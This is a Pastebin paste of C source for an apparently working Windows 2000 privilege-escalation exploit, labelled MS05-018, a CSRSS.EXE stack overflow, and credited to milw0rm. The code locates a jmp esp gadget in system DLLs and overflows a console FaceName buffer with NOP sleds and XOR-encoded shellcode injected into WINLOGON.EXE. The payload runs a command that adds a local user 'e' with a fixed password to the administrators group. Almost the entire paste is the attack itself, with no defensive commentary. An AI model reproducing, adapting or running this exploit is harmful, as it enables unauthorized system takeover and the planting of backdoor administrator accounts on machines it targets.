API tools faq
paste
Guest User

Untitled

a guest
May 19th, 2017
165
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 6.04 KB | None | 0 0
raw download clone embed print report
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <tlhelp32.h>
  4.  
  5. #pragma comment (lib,"Advapi32.lib")
  6.  
  7. typedef struct _CONSOLE_STATE_INFO    {      
  8.       /* 0x00 */  DWORD cbSize;
  9.       /* 0x04 */  COORD ScreenBufferSize;
  10.       /* 0x08 */  COORD WindowSize;
  11.       /* 0x0c */  POINT WindowPosition;
  12.       /* 0x14 */  COORD FontSize;
  13.       /* 0x18 */  DWORD FontFamily;
  14.       /* 0x1c */  DWORD FontWeight;
  15.       /* 0x20 */  WCHAR FaceName[0x200];
  16. } CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;
  17.  
  18. typedef struct xxx
  19. {
  20.     DWORD   dw[6];
  21.     char    cmd[0x50];
  22. }address_and_cmd;
  23.  
  24. char decoder[]=
  25. "\x8b\xdc"
  26. "\xBE\x44\x59\x41\x53\x46\xBF\x44\x59\x34\x53\x47\x43\x39\x33\x75"
  27. "\xFB\x83\xC3\x04\x80\x33\x97\x43\x39\x3B\x75\xF8\x45\x59\x41\x53";
  28. //user=e
  29. //pass=asd#321
  30. char add_user[]=
  31. "\x90\x90\x90\x90\x90\x90\x90\x8D\x7b\x98\xFF\x77\x14\x6A\x00\x68"
  32. "\x2A\x04\x00\x00\xFF\x17\x8B\xD8\x6A\x04\x68\x00\x10\x00\x00\x68"
  33. "\x00\x01\x00\x00\x6A\x00\x53\xFF\x57\x04\x8B\xF0\x6A\x00\x68\x00"
  34. "\x01\x00\x00\x8D\x47\x18\x50\x56\x53\xFF\x57\x08\x33\xC0\x50\x50"
  35. "\x56\xFF\x77\x10\x50\x50\x53\xFF\x57\x0C";
  36. char decode_end_sign[]="EY4S";
  37. char sc[0x200];
  38.  
  39. char    szConsoleTitle[256];
  40.  
  41. DWORD search_jmpesp()
  42. {
  43.     char szDLL[][30] = {"ntdll.dll",
  44.                         "kernel32.dll",
  45.                         "user32.dll",
  46.                         "gdi32.dll",                       
  47.                         "winsrv.dll",
  48.                         "csrsrv.dll",
  49.                         "basesrv.dll"};
  50.     int     i,y;
  51.     BOOL    done;
  52.     HMODULE h;
  53.     BYTE    *ptr;
  54.     DWORD   addr=0;
  55.  
  56.     for(i=0;i<sizeof(szDLL)/sizeof(szDLL[0]);i++)
  57.     {
  58.         done = FALSE;
  59.         h = LoadLibrary(szDLL[i]);
  60.         if(h == NULL)
  61.             continue;
  62.         printf("[+] start search \"FF E4\" in %s\n", szDLL[i]);
  63.         ptr = (BYTE *)h;
  64.         for(y = 0;!done;y++)
  65.         {
  66.             //__try ** There's no exception handling on gcc
  67.             //{
  68.                 if(ptr[y] == (BYTE)'\xFF' && ptr[y+1] == (BYTE)'\xE4')
  69.                 {
  70.                     addr = (int)ptr + y;
  71.                     done = TRUE;
  72.                     printf("[+] found \"FF E4\"(jmp esp) in %X[%s]\n", addr, szDLL[i]);
  73.                 }
  74.             //}
  75.             //__except(EXCEPTION_EXECUTE_HANDLER)
  76.             else
  77.             {
  78.                 done = TRUE;
  79.             }
  80.         }
  81.         FreeLibrary(h);
  82.         if(addr) break;
  83.     }
  84.     return addr;
  85. }
  86. BOOL make_shellcode(DWORD dwTargetPid)
  87. {
  88.     HMODULE hKernel32;
  89.     address_and_cmd aac;
  90.     int     i=0, j=0, size=0;
  91.  
  92.     hKernel32 = LoadLibrary("kernel32.dll");
  93.     if(!hKernel32) return FALSE;
  94.     aac.dw[0] = (DWORD)GetProcAddress(hKernel32, "OpenProcess");
  95.     aac.dw[1] = (DWORD)GetProcAddress(hKernel32, "VirtualAllocEx");
  96.     aac.dw[2] = (DWORD)GetProcAddress(hKernel32, "WriteProcessMemory");
  97.     aac.dw[3] = (DWORD)GetProcAddress(hKernel32, "CreateRemoteThread");
  98.     aac.dw[4] = (DWORD)GetProcAddress(hKernel32, "WinExec");
  99.     aac.dw[5] = dwTargetPid;
  100.  
  101.     memset(aac.cmd, 0, sizeof(aac.cmd));
  102.     strcpy(aac.cmd, "cmd /c net user e asd#321 /add && net localgroup administrators e /add");
  103.  
  104.     //encode
  105.     strcpy(sc, decoder);
  106.     for(i=0;i<sizeof(add_user);i++)
  107.         add_user[i]^=(BYTE)'\x97';
  108.     strcat(sc, add_user);
  109.     for(i=0;i<sizeof(aac);i++)
  110.         ((char *)&aac)[i]^=(BYTE)'\x97';
  111.     size=strlen(sc);
  112.     memcpy(&sc[size], (char *)&aac, sizeof(aac));
  113.     size+=sizeof(aac);
  114.     sc[size]='\x0';
  115.     strcat(sc, decode_end_sign);
  116.  
  117.     return TRUE;
  118. }
  119.  
  120. void exploit(HWND hwnd, DWORD dwPid)
  121. {
  122.     HANDLE              hFile;
  123.     LPVOID              lp;
  124.     int                 i, index;
  125.     DWORD               dwJMP;
  126.     CONSOLE_STATE_INFO  csi;
  127.  
  128.  
  129.     memset((void *)&csi, 0, sizeof(csi));
  130.     csi.cbSize = sizeof(csi);
  131.     csi.ScreenBufferSize.X = 0x0050;
  132.     csi.ScreenBufferSize.Y = 0x012c;
  133.     csi.WindowSize.X = 0x0050;
  134.     csi.WindowSize.Y=0x0019;
  135.     csi.WindowPosition.x = 0x58;
  136.     csi.WindowPosition.y = 0x58;
  137.     csi.FontSize.X = 0;
  138.     csi.FontSize.Y=0xc;
  139.     csi.FontFamily = 0x36;
  140.     csi.FontWeight = 0x190;
  141.    
  142.     for(i=0;i<0x58;i++)
  143.         ((char *)csi.FaceName)[i] = '\x90';
  144.     dwJMP = search_jmpesp();
  145.     if(!dwJMP)
  146.     {
  147.         printf("[-] search FF E4 failed.\n");
  148.         return;
  149.     }
  150.     memcpy(&((char *)csi.FaceName)[0x58], (char *)&dwJMP, 4);
  151.     for(i=0;i<0x20;i++)
  152.         strcat((char *)csi.FaceName, "\x90");
  153.     index = strlen((char *)csi.FaceName);
  154.  
  155.     if(!make_shellcode(dwPid)) return;
  156.     memcpy(&((char *)csi.FaceName)[index], (char *)sc, strlen(sc));
  157.  
  158.     hFile = CreateFileMappingW((void *)0xFFFFFFFF,0,4,0,csi.cbSize,0);
  159.     if(!hFile)
  160.     {
  161.         printf("[-] CreateFileMapping failed:%d\n", GetLastError());
  162.         return;
  163.     }
  164.     printf("[+] CreateFileMapping OK!\n");
  165.     lp = MapViewOfFile(hFile, 0x0F001F,0,0,0);
  166.     if(!lp)
  167.     {
  168.         printf("[-] MapViewOfFile failed:%d\n", GetLastError());
  169.         return;
  170.     }
  171.     printf("[+] MapViewOfFile OK!\n");
  172.     //copy
  173.     memcpy((unsigned short *)lp, (unsigned short *)&csi, csi.cbSize);
  174.  
  175.     printf("[+] Send Exploit!\n");
  176.     SendMessageW(hwnd,0x4C9,(WPARAM)hFile,0);
  177. }
  178.  
  179. void main(int argc, char **argv)
  180. {
  181.     DWORD   dwRet;
  182.     HWND    hwnd = NULL;
  183.     DWORD   dwPid = 0;
  184.     HANDLE hSnapshot = NULL;
  185.     PROCESSENTRY32      pe;
  186.  
  187.     printf( "MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0\n"
  188.             "Affect: Windows 2000 sp3/sp4 (all language)\n"
  189.             "Coded by eyas <eyas at xfocus.org>\n"
  190.             "http://www.xfocus.net\n\n");
  191.    
  192.     if(argc==2)
  193.     {
  194.         dwPid = atoi(argv[1]);
  195.     }
  196.     else
  197.     {
  198.         printf("Usage: %s pid\n\n", argv[0]);
  199.         hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  200.         pe.dwSize = sizeof(PROCESSENTRY32);
  201.         Process32First(hSnapshot,&pe);
  202.         do
  203.         {      
  204.             if( strcmpi(pe.szExeFile, "WINLOGON.EXE") == 0)
  205.             {
  206.                 printf("[+] PID=%d Process=%s\n", pe.th32ProcessID, pe.szExeFile);
  207.             }
  208.         }
  209.         while(Process32Next(hSnapshot,&pe)==TRUE);
  210.         CloseHandle (hSnapshot);
  211.     }
  212.  
  213.     if(!dwPid)  return;
  214.  
  215.     if(!FreeConsole())
  216.         printf("[-] FreeConsole failed:%d\n", GetLastError());
  217.     else
  218.     {
  219.         printf("[+] FreeConsole ok.\n");
  220.         if(!AllocConsole())
  221.             printf("[-] AllocConsole failed:%d\n", GetLastError());
  222.         else
  223.             printf("[+] AllocConsole ok.\n");
  224.     }
  225.  
  226.     dwRet = GetConsoleTitle(szConsoleTitle, sizeof(szConsoleTitle));
  227.     if(dwRet)
  228.     {
  229.         printf("[+] Get Console Title OK:\"%s\"\n", szConsoleTitle);
  230.     }
  231.     else
  232.     {
  233.         printf("[-] Get Console Title failed.\n");
  234.         return;
  235.     }
  236.  
  237.     hwnd = FindWindow("ConsoleWindowClass",szConsoleTitle);
  238.     if(hwnd)
  239.         printf("[+] bingo! found hwnd=%X\n", hwnd);
  240.     else
  241.     {
  242.         printf("[-] can't found hwnd!\n");
  243.         return;
  244.     }
  245.  
  246.     exploit(hwnd, dwPid);
  247.     printf("[+] Done.\n");
  248. }
  249.  
  250. // milw0rm.com [2005-09-06]
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!